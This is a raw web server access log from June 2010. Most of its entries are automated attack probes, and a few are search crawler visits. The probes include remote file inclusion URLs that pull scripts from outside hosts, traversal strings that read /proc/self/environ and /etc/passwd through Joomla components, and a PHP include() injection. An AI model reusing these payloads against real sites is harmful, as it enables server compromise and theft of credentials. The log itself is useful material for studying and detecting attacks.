81.80.122.44 - - [02/Jun/2010:05:01:06 -0500] "GET /logs/access_log.1243900800//Neos_Chronos/header.php?base_folder=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
81.80.122.44 - - [02/Jun/2010:05:01:48 -0500] "GET /logs/access_log.1231718400//Neos_Chronos/header.php?base_folder=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
81.80.122.44 - - [02/Jun/2010:05:01:52 -0500] "GET /logs/access_log.1214611200//Neos_Chronos/header.php?base_folder=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
81.80.122.44 - - [02/Jun/2010:05:02:03 -0500] "GET /logs/access_log.1217030400//Neos_Chronos/header.php?base_folder=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
81.80.122.44 - - [02/Jun/2010:05:02:04 -0500] "GET /logs/access_log.1243382400//Neos_Chronos/header.php?base_folder=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
69.72.202.214 - - [02/Jun/2010:05:05:45 -0500] "GET /logs/access_log.1271462400/index.php?option=com_jvehicles&controller=http://vutanet.com/1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.72.202.214 - - [02/Jun/2010:05:05:45 -0500] "GET /index.php?option=com_jvehicles&controller=http://vutanet.com/1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
69.72.202.214 - - [02/Jun/2010:05:05:45 -0500] "GET /logs/index.php?option=com_jvehicles&controller=http://vutanet.com/1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
207.46.199.46 - - [02/Jun/2010:05:06:28 -0500] "GET /logs/access_log.1226448000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
38.101.148.126 - - [02/Jun/2010:05:08:08 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [02/Jun/2010:05:08:12 -0500] "GET /logs/access_log.1222646400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
121.88.4.141 - - [02/Jun/2010:05:08:25 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
121.88.4.141 - - [02/Jun/2010:05:08:25 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
121.88.4.141 - - [02/Jun/2010:05:08:26 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
81.80.122.44 - - [02/Jun/2010:05:08:42 -0500] "GET /logs/access_log.1271548800//Neos_Chronos/header.php?base_folder=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
81.80.122.44 - - [02/Jun/2010:05:08:43 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
81.80.122.44 - - [02/Jun/2010:05:08:43 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
193.164.131.82 - - [02/Jun/2010:05:09:30 -0500] "GET /logs/index2.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
193.164.131.82 - - [02/Jun/2010:05:09:30 -0500] "GET /index2.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.51.171.188 - - [02/Jun/2010:05:09:32 -0500] "GET /logs/index2.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
209.51.171.188 - - [02/Jun/2010:05:09:33 -0500] "GET /index2.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
216.65.69.227 - - [02/Jun/2010:05:10:01 -0500] "GET /logs/index2.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
216.65.69.227 - - [02/Jun/2010:05:10:02 -0500] "GET /index2.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
81.80.122.44 - - [02/Jun/2010:05:12:47 -0500] "GET /logs/access_log.1271894400//Neos_Chronos/header.php?base_folder=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
81.80.122.44 - - [02/Jun/2010:05:13:00 -0500] "GET /logs/access_log.1271030400//Neos_Chronos/header.php?base_folder=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
76.12.58.212 - - [02/Jun/2010:05:14:06 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [02/Jun/2010:05:14:11 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.227.143.132 - - [02/Jun/2010:05:14:20 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
58.230.162.220 - - [02/Jun/2010:05:14:40 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
58.230.162.220 - - [02/Jun/2010:05:14:40 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
58.230.162.220 - - [02/Jun/2010:05:14:41 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
58.230.162.220 - - [02/Jun/2010:05:14:53 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
58.230.162.220 - - [02/Jun/2010:05:14:53 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
58.230.162.220 - - [02/Jun/2010:05:14:54 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
74.54.63.138 - - [02/Jun/2010:05:15:00 -0500] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
74.54.63.138 - - [02/Jun/2010:05:15:00 -0500] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
76.12.58.212 - - [02/Jun/2010:05:15:18 -0500] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
76.12.58.212 - - [02/Jun/2010:05:15:18 -0500] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.195.112.180 - - [02/Jun/2010:05:15:29 -0500] "GET /logs/access_log.1169856000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.227.143.132 - - [02/Jun/2010:05:15:38 -0500] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
67.227.143.132 - - [02/Jun/2010:05:15:38 -0500] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
124.217.229.185 - - [02/Jun/2010:05:16:24 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
124.217.229.185 - - [02/Jun/2010:05:17:54 -0500] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
124.217.229.185 - - [02/Jun/2010:05:17:55 -0500] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
89.200.142.93 - - [02/Jun/2010:05:20:00 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
67.195.112.180 - - [02/Jun/2010:05:20:47 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
204.188.235.66 - - [02/Jun/2010:05:22:10 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
121.88.4.141 - - [02/Jun/2010:05:23:40 -0500] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.79"
77.222.56.62 - - [02/Jun/2010:05:23:43 -0500] "GET //admin.php?cal_dir=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
77.222.56.62 - - [02/Jun/2010:05:23:43 -0500] "GET /logs//admin.php?cal_dir=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
207.46.204.197 - - [02/Jun/2010:05:24:07 -0500] "GET /logs/access_log.1267574400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.121.64.231 - - [02/Jun/2010:05:26:29 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
194.100.228.237 - - [02/Jun/2010:05:27:59 -0500] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
194.100.228.237 - - [02/Jun/2010:05:27:59 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
222.122.52.80 - - [02/Jun/2010:05:28:57 -0500] "GET //setup.php?dir=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
222.122.52.80 - - [02/Jun/2010:05:28:58 -0500] "GET /logs//setup.php?dir=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
204.188.235.66 - - [02/Jun/2010:05:29:21 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
208.113.148.15 - - [02/Jun/2010:05:30:17 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
208.113.148.15 - - [02/Jun/2010:05:30:17 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
208.113.148.15 - - [02/Jun/2010:05:30:17 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
82.197.130.141 - - [02/Jun/2010:05:31:24 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
82.197.130.141 - - [02/Jun/2010:05:31:24 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
82.197.130.141 - - [02/Jun/2010:05:31:24 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
208.113.148.15 - - [02/Jun/2010:05:31:39 -0500] "GET /logs/access_log.1271548800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
84.53.217.109 - - [02/Jun/2010:05:31:54 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
84.53.217.109 - - [02/Jun/2010:05:31:54 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
84.53.217.109 - - [02/Jun/2010:05:31:54 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
211.132.187.170 - - [02/Jun/2010:05:32:31 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
211.132.187.170 - - [02/Jun/2010:05:32:33 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
82.197.130.141 - - [02/Jun/2010:05:32:39 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
173.201.187.126 - - [02/Jun/2010:05:32:44 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.200.142.93 - - [02/Jun/2010:05:32:44 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
208.113.148.15 - - [02/Jun/2010:05:32:56 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
211.132.187.170 - - [02/Jun/2010:05:33:01 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
211.132.187.170 - - [02/Jun/2010:05:33:01 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
123.125.68.77 - - [02/Jun/2010:05:33:11 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
82.197.130.141 - - [02/Jun/2010:05:33:50 -0500] "GET /logs/access_log.1223683200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
84.53.217.109 - - [02/Jun/2010:05:34:01 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
209.126.254.141 - - [02/Jun/2010:05:34:01 -0500] "GET /logs//index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 299 "-""Mozilla/5.0"
209.126.254.141 - - [02/Jun/2010:05:34:01 -0500] "GET //index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 294 "-""Mozilla/5.0"
209.126.254.141 - - [02/Jun/2010:05:34:01 -0500] "GET /logs/access_log.1274832000%20%20//index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 323 "-""Mozilla/5.0"
208.113.148.15 - - [02/Jun/2010:05:34:02 -0500] "GET /logs/access_log.1223683200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
209.126.254.141 - - [02/Jun/2010:05:34:02 -0500] "GET /logs/access_log.1274832000%20%20//index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 323 "-""libwww-perl/5.76"
209.126.254.141 - - [02/Jun/2010:05:34:02 -0500] "GET /logs//index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
209.126.254.141 - - [02/Jun/2010:05:34:02 -0500] "GET //index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
209.126.254.141 - - [02/Jun/2010:05:34:02 -0500] "GET /logs//index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 299 "-"""
209.126.254.141 - - [02/Jun/2010:05:34:02 -0500] "GET /logs/access_log.1274832000%20%20//index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 323 "-"""
209.126.254.141 - - [02/Jun/2010:05:34:02 -0500] "GET //index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 294 "-"""
209.126.254.141 - - [02/Jun/2010:05:34:02 -0500] "GET /logs/access_log.1274832000%20%20//index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-"""
209.126.254.141 - - [02/Jun/2010:05:34:02 -0500] "GET /logs//index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-"""
209.126.254.141 - - [02/Jun/2010:05:34:02 -0500] "GET //index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-"""
208.113.148.15 - - [02/Jun/2010:05:34:21 -0500] "GET /logs/access_log.1271894400//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
173.201.187.126 - - [02/Jun/2010:05:34:32 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
82.197.130.141 - - [02/Jun/2010:05:35:14 -0500] "GET /logs/access_log.1271548800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
82.197.130.141 - - [02/Jun/2010:05:35:48 -0500] "GET /logs/access_log.1271894400//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
84.53.217.109 - - [02/Jun/2010:05:35:49 -0500] "GET /logs/access_log.1223683200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
38.101.148.126 - - [02/Jun/2010:05:37:32 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [02/Jun/2010:05:37:36 -0500] "GET /logs/access_log.1238025600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
84.53.217.109 - - [02/Jun/2010:05:37:36 -0500] "GET /logs/access_log.1271548800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
84.53.217.109 - - [02/Jun/2010:05:37:36 -0500] "GET /logs/access_log.1271894400//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
209.126.254.141 - - [02/Jun/2010:05:39:04 -0500] "GET /logs/access_log.1274313600%20%20//index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 323 "-""Mozilla/5.0"
209.126.254.141 - - [02/Jun/2010:05:39:06 -0500] "GET /logs/access_log.1274313600%20%20//index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 323 "-""libwww-perl/5.76"
209.126.254.141 - - [02/Jun/2010:05:39:06 -0500] "GET /logs/access_log.1274313600%20%20//index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 323 "-"""
209.126.254.141 - - [02/Jun/2010:05:39:06 -0500] "GET /logs/access_log.1274313600%20%20//index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-"""
64.131.77.225 - - [02/Jun/2010:05:42:10 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
64.131.77.225 - - [02/Jun/2010:05:42:10 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
87.250.255.243 - - [02/Jun/2010:05:42:12 -0500] "GET /costume/thmb2.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
209.51.171.188 - - [02/Jun/2010:05:42:16 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
209.51.171.188 - - [02/Jun/2010:05:42:16 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
94.23.11.114 - - [02/Jun/2010:05:42:50 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.11.114 - - [02/Jun/2010:05:42:50 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.11.114 - - [02/Jun/2010:05:42:51 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.11.114 - - [02/Jun/2010:05:42:51 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
64.131.77.225 - - [02/Jun/2010:05:43:02 -0500] "GET /logs/access_log.1274832000//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.131.77.225 - - [02/Jun/2010:05:43:02 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.131.77.225 - - [02/Jun/2010:05:43:03 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
211.132.187.170 - - [02/Jun/2010:05:44:20 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
211.132.187.170 - - [02/Jun/2010:05:44:23 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
123.226.235.149 - - [02/Jun/2010:05:44:28 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
123.226.235.149 - - [02/Jun/2010:05:44:28 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
211.132.187.170 - - [02/Jun/2010:05:44:34 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
211.132.187.170 - - [02/Jun/2010:05:44:39 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
123.226.235.149 - - [02/Jun/2010:05:44:39 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
123.226.235.149 - - [02/Jun/2010:05:44:40 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
76.73.80.242 - - [02/Jun/2010:05:45:42 -0500] "GET /logs/access_log.1274832000//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
76.73.80.242 - - [02/Jun/2010:05:45:42 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
76.73.80.242 - - [02/Jun/2010:05:45:42 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
72.55.146.140 - - [02/Jun/2010:05:45:45 -0500] "GET /logs/access_log.1274832000//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
72.55.146.140 - - [02/Jun/2010:05:45:45 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.55.146.140 - - [02/Jun/2010:05:45:45 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.55.146.140 - - [02/Jun/2010:05:45:51 -0500] "GET /logs/access_log.1274832000//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
